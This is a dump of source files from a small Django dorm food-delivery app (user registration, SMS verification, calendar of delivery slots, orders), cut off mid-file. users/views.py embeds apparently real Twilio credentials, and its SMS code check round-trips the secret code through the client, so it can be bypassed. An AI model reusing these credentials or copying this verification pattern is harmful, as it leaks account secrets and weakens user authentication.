handle_message\n\n def shape(self, text, parameters=None, onchange=None):\n \"\"\"Shapes a text\n\n This shapes a piece of text.\n\n Args:\n text (str): A string of text\n parameters: A dictionary containing parameters to pass to Harfbuzz.\n Relevant keys include ``script``, ``direction``, ``language``\n (these three are normally guessed from the string contents),\n ``features``, ``variations`` and ``shaper``.\n onchange: An optional function with three parameters. 
See below.\n\n Additionally, if an `onchange` function is provided, this will be called\n every time the buffer changes *during* shaping, with the following arguments:\n\n - ``self``: the vharfbuzz object.\n - ``stage``: either \"GSUB\" or \"GPOS\"\n - ``lookupid``: the current lookup ID\n - ``buffer``: a copy of the buffer as a list of lists (glyphname, cluster, position)\n\n Returns:\n A uharfbuzz ``hb.Buffer`` object\n \"\"\"\n if not parameters:\n parameters = {}\n self.prepare_shaper()\n buf = hb.Buffer()\n buf.add_str(text)\n buf.guess_segment_properties()\n if \"script\" in parameters and parameters[\"script\"]:\n buf.script = parameters[\"script\"]\n if \"direction\" in parameters and parameters[\"direction\"]:\n buf.direction = parameters[\"direction\"]\n if \"language\" in parameters and parameters[\"language\"]:\n buf.language = parameters[\"language\"]\n shapers = self.shapers\n if \"shaper\" in parameters and parameters[\"shaper\"]:\n shapers = [parameters[\"shaper\"]]\n\n features = parameters.get(\"features\")\n if \"variations\" in parameters:\n self.hbfont.set_variations(parameters[\"variations\"])\n self.stage = \"GSUB\"\n if onchange:\n f = self.make_message_handling_function(buf, onchange)\n buf.set_message_func(f)\n hb.shape(self.hbfont, buf, features, shapers=shapers)\n self.stage = \"GPOS\"\n return buf\n\n def _copy_buf(self, buf):\n # Or at least the bits we care about\n outs = []\n for info, pos in zip(buf.glyph_infos, buf.glyph_positions):\n l = [self.glyphOrder[info.codepoint], info.cluster]\n if self.stage == \"GPOS\":\n l.append(pos.position)\n else:\n l.append(None)\n outs.append(l)\n return outs\n\n def serialize_buf(self, buf, glyphsonly=False):\n \"\"\"Serializes a buffer to a string\n\n Returns the contents of the given buffer in a string format similar to\n that used by ``hb-shape``.\n\n Args:\n buf: The ``hb.Buffer`` object.\n\n Returns: A serialized string.\n\n \"\"\"\n outs = []\n for info, pos in zip(buf.glyph_infos, buf.glyph_positions):\n glyphname = self.glyphOrder[info.codepoint]\n if glyphsonly:\n outs.append(glyphname)\n continue\n outs.append(\"%s=%i\" % (glyphname, info.cluster))\n if self.stage == \"GPOS\" and (pos.position[0] != 0 or pos.position[1] != 0):\n outs[-1] = outs[-1] + \"@%i,%i\" % (pos.position[0], pos.position[1])\n if self.stage == \"GPOS\":\n outs[-1] = outs[-1] + \"+%i\" % (pos.position[2])\n return \"|\".join(outs)\n\n def buf_from_string(self, s):\n \"\"\"Deserializes a string.\n\n This attempts to perform the inverse operation to :py:meth:`serialize_buf`,\n turning a serialized buffer back into an object. 
The object is not a\n ``hb.Buffer``, but has a similar structure (``glyph_infos`` and ``glyph_positions``)\n so can be passed to code which expects a ``hb.Buffer``, such as\n :py:meth:`buf_to_svg` below.\n\n Args:\n s (str): A string produced by :py:meth:`serialize_buf`\n\n Returns a ``FakeBuffer`` object.\n \"\"\"\n buf = FakeBuffer()\n buf.glyph_infos = []\n buf.glyph_positions = []\n for item in s.split(\"|\"):\n m = re.match(r\"^(.*)=(\\d+)(@(-?\\d+),(-?\\d+))?(\\+(-?\\d+))?$\", item)\n if not m:\n raise ValueError(\"Couldn't parse glyph %s in %s\" % (item,s))\n groups = m.groups()\n info = FakeItem()\n info.codepoint = self.ttfont.getGlyphID(groups[0])\n info.cluster = int(groups[1])\n buf.glyph_infos.append(info)\n pos = FakeItem()\n pos.position = [ int(x or 0) for x in (groups[3], groups[4], groups[6], 0) ] # Sorry, vertical scripts\n buf.glyph_positions.append(pos)\n return buf\n\n def setup_svg_draw_funcs(self):\n if self.drawfuncs:\n return\n\n def move_to(x, y, c):\n c[\"output_string\"] = c[\"output_string\"] + f\"M{x},{y}\"\n\n def line_to(x, y, c):\n c[\"output_string\"] = c[\"output_string\"] + f\"L{x},{y}\"\n\n def cubic_to(c1x, c1y, c2x, c2y, x, y, c):\n c[\"output_string\"] = (\n c[\"output_string\"] + f\"C{c1x},{c1y} {c2x},{c2y} {x},{y}\"\n )\n\n def quadratic_to(c1x, c1y, x, y, c):\n c[\"output_string\"] = c[\"output_string\"] + f\"Q{c1x},{c1y} {x},{y}\"\n\n def close_path(c):\n c[\"output_string\"] = c[\"output_string\"] + \"Z\"\n\n self.drawfuncs = hb.DrawFuncs()\n self.drawfuncs.set_move_to_func(move_to)\n self.drawfuncs.set_line_to_func(line_to)\n self.drawfuncs.set_cubic_to_func(cubic_to)\n self.drawfuncs.set_quadratic_to_func(quadratic_to)\n self.drawfuncs.set_close_path_func(close_path)\n\n def glyph_to_svg_path(self, gid):\n \"\"\"Converts a glyph to SVG\n\n Args:\n gid (int): Glyph ID to render\n\n Returns: An SVG string containing a path to represent the glyph.\n \"\"\"\n if not hasattr(hb, \"DrawFuncs\"):\n raise ValueError(\n \"glyph_to_svg_path requires uharfbuzz with draw function support\"\n )\n\n self.setup_svg_draw_funcs()\n container = {\"output_string\": \"\"}\n self.drawfuncs.draw_glyph(self.hbfont, gid, container)\n return container[\"output_string\"]\n\n def buf_to_svg(self, buf):\n \"\"\"Converts a buffer to SVG\n\n Args:\n buf (hb.Buffer): uharfbuzz ``hb.Buffer``\n\n Returns: An SVG string containing a rendering of the buffer\n \"\"\"\n x_cursor = 0\n paths = []\n svg = \"\"\n if \"hhea\" in self.ttfont:\n ascender = self.ttfont[\"hhea\"].ascender + 500\n descender = self.ttfont[\"hhea\"].descender - 500\n fullheight = ascender - descender\n elif \"OS/2\":\n ascender = self.ttfont[\"OS/2\"].sTypoAscender + 500\n descender = self.ttfont[\"OS/2\"].sTypoDescender - 500\n fullheight = ascender - descender\n else:\n fullheight = 1500\n descender = 500\n y_cursor = -descender\n\n for info, pos in zip(buf.glyph_infos, buf.glyph_positions):\n glyph_path = self.glyph_to_svg_path(info.codepoint)\n dx, dy = pos.position[0], pos.position[1]\n p = (\n f'<path d=\"{glyph_path}\" '\n + f' transform=\"translate({x_cursor+dx}, {y_cursor+dy})\"/>\\n'\n )\n svg += p\n x_cursor += pos.position[2]\n y_cursor += pos.position[3]\n\n svg = (\n (\n f'<svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 {x_cursor} {fullheight}\"'\n + ' transform=\"matrix(1 0 0 -1 0 0)\">\\n'\n )\n + svg\n + \"</svg>\\n\"\n )\n return svg\n\n\n# v = Vharfbuzz(\"/Users/simon/Library/Fonts/SourceSansPro-Regular.otf\")\n# buf = v.shape(\"ABCj\")\n# svg = v.buf_to_svg(buf)\n# import 
cairosvg\n# cairosvg.svg2png(bytestring=svg, write_to=\"foo.png\")\n"
},
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5,
"avg_line_length": 29.83333396911621,
"blob_id": "38f333fb5412e12cd60f340c6245ca47ca58c67f",
"content_id": "6df31acdb377581cc244c0b12eb1f643c019f9a5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 186,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 6,
"path": "/docs/index.rst",
"repo_name": "moyogo/vharfbuzz",
"src_encoding": "UTF-8",
"text": "vharfbuzz: A user-friendlier way to use Harfbuzz in Python\n==========================================================\n\n.. automodule:: vharfbuzz\n :members:\n :member-order: bysource\n\n"
},
{
"alpha_fraction": 0.7269961833953857,
"alphanum_fraction": 0.7323194146156311,
"avg_line_length": 31.875,
"blob_id": "6901857bb17bd8b9473ee2b9c0c9a140d85f73c0",
"content_id": "c7863eda886cb8fab68c1c0973c4cdc29e378241",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1315,
"license_type": "permissive",
"max_line_length": 374,
"num_lines": 40,
"path": "/README.md",
"repo_name": "moyogo/vharfbuzz",
"src_encoding": "UTF-8",
"text": "# vharfbuzz - A user-friendlier way to use Harfbuzz in Python\n\n[uharfbuzz](https://github.com/harfbuzz/uharfbuzz) is an _awesome_ tool for shaping text in Python. But it wraps the Harfbuzz C interface quite closely, so still requires you to perform a bunch of boilerplate operations before you can get on with the shaping. This module allows you a slightly more high-level interface to the text shaping process. For example, rather than:\n\n```python\nwith open(sys.argv[1], 'rb') as fontfile:\n fontdata = fontfile.read()\n\ntext = sys.argv[2]\n\nface = hb.Face(fontdata)\nfont = hb.Font(face)\n\nbuf = hb.Buffer()\nbuf.add_str(text)\nbuf.guess_segment_properties()\n\nfeatures = {\"kern\": True, \"liga\": True}\nhb.shape(font, buf, features)\n```\n\nwith `vharfbuzz` you can just say:\n\n```python\nvhb = Vharfbuzz(sys.argv[1])\nbuf = vhb.shape(sys.argv[2], {\"features\": {\"kern\": True, \"liga\": True}})\n```\n\nThe `Vharfbuzz` class also contains a number of other helpful methods to perform common operations on Harfbuzz buffers. See [Read The Docs](https://vharfbuzz.readthedocs.io/en/latest/) for more information.\n\n## Installation\n\nvharfbuzz is available from `pypi`, so can be installed like so:\n\n pip3 install vharfbuzz\n\nIf building from source, you can install it like so:\n\n pip3 install -r requirements.txt\n pip3 install .\n"
}
] | 3 |
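Putting the pieces of this record together, the intended flow is: construct a `Vharfbuzz` from a font file, shape a string, then serialize or render the resulting buffer. A minimal sketch follows, using only methods defined in the record's `__init__.py`; the font path `some-font.ttf` is an illustrative assumption (any TTF/OTF on disk works), and `buf_to_svg` additionally requires a uharfbuzz build with draw-function support.

```python
from vharfbuzz import Vharfbuzz

vhb = Vharfbuzz("some-font.ttf")  # assumed path, not part of the repo
buf = vhb.shape("fiddly", {"features": {"kern": True, "liga": True}})

# Serialized form is pipe-separated: glyph=cluster[@dx,dy]+advance
print(vhb.serialize_buf(buf))

# Render the shaped buffer to an SVG file.
with open("out.svg", "w") as f:
    f.write(vhb.buf_to_svg(buf))
```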
ghimirekiran/inetrn
|
https://github.com/ghimirekiran/inetrn
|
05ee98a3287067512a2a1c46498e5b44a90c6cc6
|
628beaaa80e25d27e0aecdc08f1ac2b1553c9c98
|
17ed36be970282b617c0cdab6abf1fa208996ea6
|
refs/heads/master
| 2020-04-16T13:07:19.638490 | 2019-01-14T07:08:15 | 2019-01-14T07:08:15 | 165,612,358 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4368421137332916,
"alphanum_fraction": 0.4894736707210541,
"avg_line_length": 17,
"blob_id": "645507e8374daf106d204218d5e6cfc6dae5303a",
"content_id": "d26dfd90dbb8ce6cb7fd4e771b86a6bc608877a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 190,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 10,
"path": "/fab.py",
"repo_name": "ghimirekiran/inetrn",
"src_encoding": "UTF-8",
"text": "odd, even = 0,1\r\ntotal = 0\r\nwhile True:\r\n odd = odd + even #Odd\r\n even = odd + even #Even\r\n if even < 4000000:\r\n total += even\r\n else:\r\n break\r\nprint (total)\r\n"
}
] | 1 |
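The fab.py record above sums the even-valued Fibonacci terms below 4,000,000 (Project Euler #2, whose well-known answer is 4613732); the original loop labeled alternate terms `#Odd`/`#Even`, but Fibonacci parity actually cycles odd, odd, even, so a parity test is needed. The filter can also be dropped entirely, because the even-valued terms satisfy their own recurrence E(n) = 4*E(n-1) + E(n-2) (2, 8, 34, 144, ...). A sketch of that variant, with a hypothetical helper name:

```python
def even_fib_sum(limit):
    # Even-valued Fibonacci terms obey E(n) = 4*E(n-1) + E(n-2),
    # so we can step through only the even terms directly.
    a, b, total = 2, 8, 0
    while a < limit:
        total += a
        a, b = b, 4 * b + a
    return total

assert even_fib_sum(4000000) == 4613732  # Project Euler #2
```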
ehg17/dormserv
|
https://github.com/ehg17/dormserv
|
ff934c072f8da1ad1ad3ab0459081472da68a4a9
|
47d2d4830ae3376657a9555f1bb260a6452a889c
|
6e0c88d5d1d7badae16198a232c6f2c9ca91a3fd
|
refs/heads/master
| 2016-08-02T22:05:40.230487 | 2014-02-01T19:10:12 | 2014-02-01T19:10:12 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7913907170295715,
"alphanum_fraction": 0.7913907170295715,
"avg_line_length": 29.100000381469727,
"blob_id": "927047c6617e59cf766afaad88d2d34c701827b0",
"content_id": "520033f559d5b071eb4a2cb124e059386c3e7586",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 302,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 10,
"path": "/users/admin.py",
"repo_name": "ehg17/dormserv",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\n# Import the UserProfile model individually.\nfrom users.models import UserProfile\nfrom django.contrib.auth.models import User\n\nclass UserProfileAdmin(admin.ModelAdmin):\n\tlist_display = ('id', 'user','dorm','room',)\n\n\nadmin.site.register(UserProfile, UserProfileAdmin)\n\n"
},
{
"alpha_fraction": 0.658445417881012,
"alphanum_fraction": 0.6722720265388489,
"avg_line_length": 24.740385055541992,
"blob_id": "3cac897e619edafeb831cdaab419e28edb56e9fa",
"content_id": "7796892ece2fae6725557e19d93b2e177cf61e82",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2676,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 104,
"path": "/dormserv/cal/models.py",
"repo_name": "ehg17/dormserv",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom users.models import User, UserProfile\nfrom django.contrib import admin\nimport datetime\nfrom django.utils import timezone\nfrom datetime import date, time, timedelta\nfrom django.template import RequestContext\n\n\nclass Entry(models.Model):\n\tstart_time = models.TimeField(auto_now=False)\n\tdate = models.DateField(auto_now=False)\n\tdeliveries_avail = models.IntegerField(default=2)\n\tdemand_counter = models.IntegerField(default=0)\n\n\tdef fifteen_over(self):\n\t\td_ref = self.date.strftime(\"%Y:%m:%d\")\n\t\td_ref_spl = d_ref.split(\":\")\n\t\tt_ref = self.start_time.strftime(\"%I:%M\")\n\t\tt_ref_spl = t_ref.split(\":\")\n\t\tdt = datetime.datetime(int(d_ref_spl[0]), int(d_ref_spl[1]), int(d_ref_spl[2]), int(t_ref_spl[0]), int(t_ref_spl[1]), 00)\n\t\ttime_of_concern = dt + datetime.timedelta(minutes=15)\n\t\tt = time_of_concern.strftime(\"%I:%M\")\n\t\tif t[0] == \"0\":\n\t\t\treturn t[1:] + \" am\"\n\t\treturn t + \" am\"\n\n\tdef view_date(self):\n\t\treturn self.date.strftime(\"%m/%d\")\n\n\tdef is_active(self):\n\t\tif self.deliveries_avail > 0:\n\t\t\treturn True\n\t\treturn False\n\n\tdef week_day(self):\n\t\tiso = self.date.isocalendar()\n\t\treturn iso[2]\n\n\tdef display_time(self):\n\t\tt = self.start_time.strftime(\"%I:%M\")\n\t\tif t[0] == \"0\":\n\t\t\treturn t[1:] + \" am\"\n\t\treturn t + \" am\"\n\n\tdef week_num(self):\n\t\tiso = self.date.isocalendar()\n\t\treturn iso[1]\n\n\tdef __unicode__(self):\n\t\treturn str(self.start_time) + \" \" + str(self.date)\n\n\tdef increase_demand_counter(self):\n\t\tself.demand_counter = self.demand_counter + 1\n\n\tdef decrease_deliveries_avail(self):\n\t\tself.deliveries_avail = self.deliveries_avail - 1\n\n\t\n\t#each order mapped to a certain array of food items\n\nclass Item(models.Model):\n\tEGGS = 'EGG'\n\tCOFFEE = 'COF'\n\tFRUITS = 'FRU'\n\tOATS = 'OAT'\n\tYOGURT = 'YOG'\n\tBAKERY = 'BAK'\n\tITEM_CATEGORIES = (\n\t\t(EGGS, 'EGG'),\n\t\t(COFFEE, 'COF'),\n\t\t(FRUITS, 'FRU'),\n\t\t(OATS, 'OAT'),\n\t\t(YOGURT, 'YOG'),\n\t\t(BAKERY, 'BAK'),\n\t\t)\n\titem_name = models.CharField(max_length = 80)\n\titem_price = models.FloatField(max_length = 5)\n\titem_description = models.TextField(max_length=200)\n\titem_category = models.CharField(max_length=3, choices=ITEM_CATEGORIES)\n\twanted = models.BooleanField()\n\n\tdef price_format_usd(self):\n\t\tstr_price_raw = str(self.item_price)\n\t\tprice_list = str_price_raw.split(\".\")\n\t\tdollars = price_list[0]\n\t\tcents = price_list[1]\n\t\tif len(cents) == 1:\n\t\t\tcents = cents + \"0\"\n\t\treturn dollars + \".\" + cents\n\n\n\tdef __unicode__(self):\n\t\treturn self.item_name\n\n\nclass Order(models.Model):\n\tuser = models.ForeignKey(UserProfile)\n\ttime = models.TimeField(auto_now=True)\n\tdate = models.DateField(auto_now=True)\n\ttotal_price = models.FloatField(max_length=30, default=0.0)\n\n\tdef __unicode__(self):\n\t\treturn self.id"
},
{
"alpha_fraction": 0.6272384524345398,
"alphanum_fraction": 0.6382343769073486,
"avg_line_length": 40.324676513671875,
"blob_id": "141c9f9523a62772378332e43440916e1dca3833",
"content_id": "763ad39f755b4110acad6476080da4f78ceecdeb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6366,
"license_type": "no_license",
"max_line_length": 211,
"num_lines": 154,
"path": "/users/views.py",
"repo_name": "ehg17/dormserv",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom users.models import User, UserProfile\nfrom users.forms import UserForm, UserProfileForm\nfrom django.template import RequestContext\nfrom django.shortcuts import render_to_response, redirect\nfrom users.forms import UserForm, UserProfileForm\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth import logout\nfrom django.contrib.auth.decorators import login_required\nfrom random import randint\nfrom twilio.rest import TwilioRestClient\n\ndef register(request):\n # Like before, get the request's context.\n context = RequestContext(request)\n\n # A boolean value for telling the template whether the registration was successful.\n # Set to False initially. Code changes value to True when registration succeeds.\n registered = False\n\n # If it's a HTTP POST, we're interested in processing form data.\n if request.method == 'POST':\n # Attempt to grab information from the raw form information.\n # Note that we make use of both UserForm and UserProfileForm.\n user_form = UserForm(data=request.POST)\n profile_form = UserProfileForm(data=request.POST)\n\n # If the two forms are valid...\n if user_form.is_valid() and profile_form.is_valid():\n \n # Save the user's form data to the database.\n user = user_form.save()\n\n # Now we hash the password with the set_password method.\n # Once hashed, we can update the user object.\n user.set_password(user.password)\n\n user.save()\n\n # Now sort out the UserProfile instance.\n # Since we need to set the user attribute ourselves, we set commit=False.\n # This delays saving the model until we're ready to avoid integrity problems.\n profile = profile_form.save(commit=False)\n profile.user = user\n print profile\n # Now we save the UserProfile model instance.\n profile.save()\n r0 = randint(0, 9)\n r1 = randint(0, 9)\n r2 = randint(0, 9)\n r3 = randint(0, 9)\n str_sec = str(r0)+str(r1)+str(r2)+str(r3)\n\n account_sid = \"ACd2d6a002416aad11df6d7b3d529506b2\"\n auth_token = \"616085bee1e2c14db70339a86bfa9dda\"\n client = TwilioRestClient(account_sid, auth_token)\n message = client.sms.messages.create(body=user.first_name + \", thanks for signing up for Dormserv! 
Your code is \" + str_sec, to= profile.phone, from_=\"+19146185355\") # Replace with your Twilio number\n registered = True\n return render_to_response('confirm_account.html',\n {'profile': profile.id, 'user':profile.user.id, 'str_sec':str_sec},\n context)\n\n # Invalid form or forms - mistakes or something else?\n # Print problems to the terminal.\n # They'll also be shown to the user.\n else:\n print user_form.errors, profile_form.errors\n\n # Not a HTTP POST, so we render our form using two ModelForm instances.\n # These forms will be blank, ready for user input.\n else:\n user_form = UserForm()\n profile_form = UserProfileForm()\n\n # Render the template depending on the context.\n return render_to_response(\n 'register.html',\n {'user_form': user_form, 'profile_form': profile_form, 'registered': registered},\n context)\n\ndef user_login(request):\n # Like before, obtain the context for the user's request.\n context = RequestContext(request)\n cur_usr = request.user\n if cur_usr.is_active:\n return redirect('http://127.0.0.1:8000/cal', user=cur_usr)\n\n # If the request is a HTTP POST, try to pull out the relevant information.\n if request.method == 'POST':\n # Gather the username and password provided by the user.\n # This information is obtained from the login form.\n username = request.POST['username']\n password = request.POST['password']\n\n user = authenticate(username=username, password=password)\n\n # If we have a User object, the details are correct.\n # If None (Python's way of representing the absence of a value), no user\n # with matching credentials was found.\n if user is not None:\n # Is the account active? It could have been disabled.\n if user.is_active:\n # If the account is valid and active, we can log the user in.\n # We'll send the user back to the homepage.\n login(request, user)\n print user\n\n return redirect('http://127.0.0.1:8000/cal', user=user)\n\n #return render_to_response('welcome.html', {'user' : user}, context)\n else:\n # An inactive account was used - no logging in!\n return HttpResponse(\"Your account is disabled.\")\n else:\n # Bad login details were provided. So we can't log the user in.\n #print \"Invalid login details: {0}, {1}\".format(username, password)\n return HttpResponse(\"Invalid login details supplied.\")\n\n # The request is not a HTTP POST, so display the login form.\n # This scenario would most likely be a HTTP GET.\n else:\n # No context variables to pass to the template system, hence the\n # blank dictionary object...\n return render_to_response('login.html', {}, context)\n\ndef verify_user_text(request):\n context = RequestContext(request)\n\n if request.method == 'POST':\n str_sec=request.POST.get('str_sec')\n secret_code=request.POST.get('secret_code')\n profile=request.POST.get('profile')\n user=request.POST.get('user')\n if secret_code == str_sec:\n return render_to_response('login_form.html', {}, context)\n else:\n UserProfile.objects.get(id=profile).delete()\n User.objects.get(id=user).delete()\n return render_to_response(\"register_2.html\", {}, context)\n return HttpResponse(\"error....\")\n\n\n\ndef thanks(request):\n\treturn HttpResponse(\"Thank you for registering!\")\n\t\n@login_required\ndef user_logout(request):\n # Since we know the user is logged in, we can now just log them out.\n logout(request)\n\n # Take the user back to the homepage.\n return HttpResponseRedirect('/')\n\n\n"
},
{
"alpha_fraction": 0.6767169237136841,
"alphanum_fraction": 0.6767169237136841,
"avg_line_length": 48.75,
"blob_id": "7bb99e55c309ca5403a7207d3efd6801bd867b9e",
"content_id": "e447bfcffa3247eae9e4855e4c2814e613be6b5d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 597,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 12,
"path": "/users/urls.py",
"repo_name": "ehg17/dormserv",
"src_encoding": "UTF-8",
"text": "from django.conf.urls import patterns, url\nfrom users import views\n\nurlpatterns = patterns('',\n\turl(r'^$', views.user_login, name='login'),\n url(r'^register', views.register, name='register'), # ADD NEW PATTERN!\n\turl(r'^login/$', views.user_login, name='login'), # ADD NEW PATTERN!\n\turl(r'^logout/$', views.user_logout, name='logout'), # ADD NEW PATTERN!\n\turl(r'^register/thanks/$', views.thanks, name='thanks'), # ADD NEW PATTERN!\n\turl(r'^register/welcome/$', views.thanks, name='thanks'), # ADD NEW PATTERN!\n\turl(r'^verify_user_text/', views.verify_user_text, name='verify_user_text'),\n )\n"
},
{
"alpha_fraction": 0.733558177947998,
"alphanum_fraction": 0.733558177947998,
"avg_line_length": 28.649999618530273,
"blob_id": "5f2e8043dc5a3cddaaf8d892aa329f36e7a59f08",
"content_id": "9bfc83c02e5fa695b93d3fb48597f84a2400916a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 593,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 20,
"path": "/cal/admin.py",
"repo_name": "ehg17/dormserv",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom cal.models import Entry, Item, Order\n\nclass EntryAdmin(admin.ModelAdmin):\n\tlist_display = ('start_time', 'date','deliveries_avail', 'demand_counter', 'is_active', 'week_num', 'week_day',)\n\nclass ItemAdmin(admin.ModelAdmin):\n\tlist_display = ('item_name', 'item_price', 'item_category')\n\nclass OrderInline(admin.StackedInline):\n model = Order\n\nclass OrderAdmin(admin.ModelAdmin):\n\tlist_display = ('user', 'date', 'time', 'total_price')\n\nadmin.site.register(Entry, EntryAdmin)\n\nadmin.site.register(Item, ItemAdmin)\n\nadmin.site.register(Order, OrderAdmin)\n"
},
{
"alpha_fraction": 0.5175644159317017,
"alphanum_fraction": 0.578454315662384,
"avg_line_length": 33.20000076293945,
"blob_id": "2251246a31b98fb144740719183fe633314ac399",
"content_id": "08c6568495e214d2d4d622081f3800a9b1d14335",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 854,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 25,
"path": "/dormserv/create_week.py",
"repo_name": "ehg17/dormserv",
"src_encoding": "UTF-8",
"text": "from cal.models import Entry\nfrom datetime import date, time, timedelta\nimport datetime\n\n\ndef handle(year, month, day, def_orders):\n start_date = datetime.date(year, month, day)\n list_of_dates = []\n for i in range(0,7):\n k = start_date + datetime.timedelta(days=i)\n list_of_dates.append(k)\n list_of_times = []\n deliv_times = [(7,45),(8,00),(8,15),(8,30),(8,45),(9,00),(9,15),(9,30),(9,45),(10,00),(10,15),(10,30)]\n for time in deliv_times:\n k = datetime.time(time[0], time[1])\n list_of_times.append(k)\n for d in list_of_dates:\n for t in list_of_times:\n e = Entry(start_time=t, date=d, deliveries_avail=def_orders)\n e.save()\n date_str = str(year) + \"-\" + str(month) + \"-\" + str(date)\n print \"Successfully populated\"\n\nif __name__ == \"__main__\":\n handle(2014, 01, 27, 4)"
},
{
"alpha_fraction": 0.6725944876670837,
"alphanum_fraction": 0.6833915710449219,
"avg_line_length": 30.96954345703125,
"blob_id": "8f73965656475d74f1be724cb62ca257b9be7484",
"content_id": "4f6db43e9a6ab299ea8dc52139404e411c43ae59",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6298,
"license_type": "no_license",
"max_line_length": 271,
"num_lines": 197,
"path": "/cal/views.py",
"repo_name": "ehg17/dormserv",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render, get_object_or_404\nfrom django.shortcuts import render_to_response\nfrom cal.models import Entry, Item, Order\nfrom users.models import UserProfile\nfrom forms import ItemForm\nfrom django.utils import timezone\nimport datetime\nfrom datetime import date, time\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth import logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.template import RequestContext\nfrom twilio.rest import TwilioRestClient\nimport stripe\nfrom random import randint\n\n# Create your views here.\n\n@login_required\ndef display_calendar(request):\n\tcontext = RequestContext(request)\n\tcurrent_week = datetime.datetime.now().isocalendar()[1]+1\n\tworkables = []\n\n\tfor delivery in Entry.objects.all():\n\t\tif delivery.week_num() == current_week:\n\t\t\tworkables.append(delivery)\n\n\tmon = []\n\ttue = []\n\twed = []\n\tthurs = []\n\tfri = []\n\tsat = []\n\tsun = []\n\tm_date = \"\"\n\tt_date = \"\"\n\tw_date = \"\"\n\tth_date = \"\"\n\tf_date = \"\"\n\ts_date = \"\"\n\tsu_date = \"\"\n\n\tcurrent_user = request.user\n\tprint current_user\n\tfor delivery in workables:\n\n\t\tif delivery.week_day() == 1:\n\t\t\tmon.append(delivery)\n\t\t\tk = delivery.date.strftime(\"%m/%d\")\n\t\t\tm_date = k\n\t\tif delivery.week_day() == 2:\n\t\t\ttue.append(delivery)\n\t\t\tk = delivery.date.strftime(\"%m/%d\")\n\t\t\tt_date = k\n\t\tif delivery.week_day() == 3:\n\t\t\twed.append(delivery)\n\t\t\tk = delivery.date.strftime(\"%m/%d\")\n\t\t\tw_date = k\n\t\tif delivery.week_day() == 4:\n\t\t\tthurs.append(delivery)\n\t\t\tk = delivery.date.strftime(\"%m/%d\")\n\t\t\tth_date = k\t\t\n\t\tif delivery.week_day() == 5:\n\t\t\tfri.append(delivery)\n\t\t\tk = delivery.date.strftime(\"%m/%d\")\n\t\t\tf_date = k\t\t\n\t\tif delivery.week_day() == 6:\n\t\t\tsat.append(delivery)\n\t\t\tk = delivery.date.strftime(\"%m/%d\")\n\t\t\ts_date = k\t\t\n\t\tif delivery.week_day() == 7:\n\t\t\tsun.append(delivery)\n\t\t\tk = delivery.date.strftime(\"%m/%d\")\n\t\t\tsu_date = k\t\n\tdate_tuple = (m_date, t_date, w_date, th_date, f_date, s_date, su_date)\n\treturn render_to_response(\n 'calendar.html',\n {'mon': mon, 'tue': tue, 'wed': wed, 'thurs' : thurs, 'fri': fri, 'sat': sat, 'sun': sun, 'current_user':current_user, 'date_tuple':date_tuple},\n context)\n\n\n@login_required\ndef detail(request, entry_id):\n\tcontext = RequestContext(request)\n\tentry = get_object_or_404(Entry, pk=entry_id)\n\tcurrent_entry = Entry.objects.get(id=entry_id)\n\tcurrent_user = request.user\n\tif request.method == 'POST': \n \t\titems=request.POST.getlist('item_list')\n \t\tpurchase_price = 0.0\n \t\titems_to_verify = []\n \t\tthis_user = UserProfile.objects.get(id=1)\n \t\t#create the order instance\n \t\tfor i in items:\n \t\t\tk = Item.objects.get(id=i)\n \t\t\titems_to_verify.append(k)\n \t\t\tpurchase_price = purchase_price + k.item_price\n \t\t\t\n\n \t\tptp = str(purchase_price*100+250)[:-2]\n \t\tprice_to_pass = ptp[:-2]+\".\"+ptp[-2:]\n \t\tstripe_format_str_price = ptp[:-2]+ptp[-2:]\n\n \t\torder = Order(user=this_user, total_price=purchase_price)\n \t\torder.save()\n \t\tprint str(order.total_price)\n\t\treturn render_to_response('confirm.html', {'price_to_pass': price_to_pass, 'items_to_verify':items_to_verify, 'current_user':current_user, 'this_user':this_user, 'current_entry':current_entry, 'order': order, 
